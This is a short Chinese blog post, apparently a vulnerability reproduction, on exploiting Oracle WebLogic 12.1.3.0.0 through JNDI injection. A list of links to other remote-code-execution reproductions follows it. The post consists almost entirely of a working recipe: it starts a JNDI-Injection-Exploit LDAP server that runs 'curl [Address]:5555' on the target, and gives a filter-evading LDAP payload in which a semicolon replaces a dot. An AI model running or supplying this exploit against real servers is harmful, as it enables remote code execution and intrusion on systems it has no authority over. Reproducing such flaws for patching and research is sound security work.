环境:
Weblogic 12.1.3.0.0
1.开启LDAP服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555"
2.使用Payload
PS:ldap://x.x.x;(分号)x:1389/xxx
3.效果
参考链接:
https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
相关文章
- 04-25Apache struts2 Freemarker标签远程命令执行_CVE-2017-12611(S2-053)漏洞复现
- 04-25Spring Data REST 远程代码执行漏洞(CVE-2017-8046)分析与复现
- 04-25Apache Shiro反序列化远程代码执行复现
- 04-25log4j2远程代码执行漏洞原因以及解决方案
- 04-25webmin 远程代码漏洞复现
- 04-25国产芯片之光“香山”国际亮相;Apache Log4j 远程代码执行漏洞;DeepMind 拥有 2800 亿参数的模型 | 开源日报
- 04-25IE 浏览器存在远程代码执行漏洞
- 04-25CVE-2021-21087: Adobe ColdFusion远程代码执行漏洞通告
- 04-25PowerShell ISE/文件名解析缺陷远程执行代码漏洞#RCE
- 04-25中间件漏洞篇 iis7文件解析漏洞与HTTP.SYS远程代码执行漏洞